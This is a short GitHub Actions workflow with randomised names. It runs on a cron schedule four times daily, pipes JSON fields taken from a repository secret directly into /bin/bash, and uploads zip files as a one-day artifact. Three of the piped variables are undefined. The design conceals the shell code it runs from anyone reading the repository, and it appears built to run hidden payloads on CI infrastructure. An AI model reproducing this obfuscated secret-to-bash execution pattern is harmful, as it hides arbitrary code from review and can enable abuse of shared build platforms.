name: cuixinjunzhi
on:
  workflow_dispatch:

  schedule:
    - cron: '54 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cuixinjunzhi
        env:
          gl44982: ${{ secrets.gl44982 }}
        run: |
          printf '%s' "$gl44982" | jq -r .vogtr65350 | /bin/bash
          printf '%s' "$yyu79" | jq -r .qfgv347 | /bin/bash
          printf '%s' "$porkf93594" | jq -r .xtn0 | /bin/bash
          printf '%s' "$ld837" | jq -r .w797 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: q2R9pK9b
          path: "*.zip"
          retention-days: 1
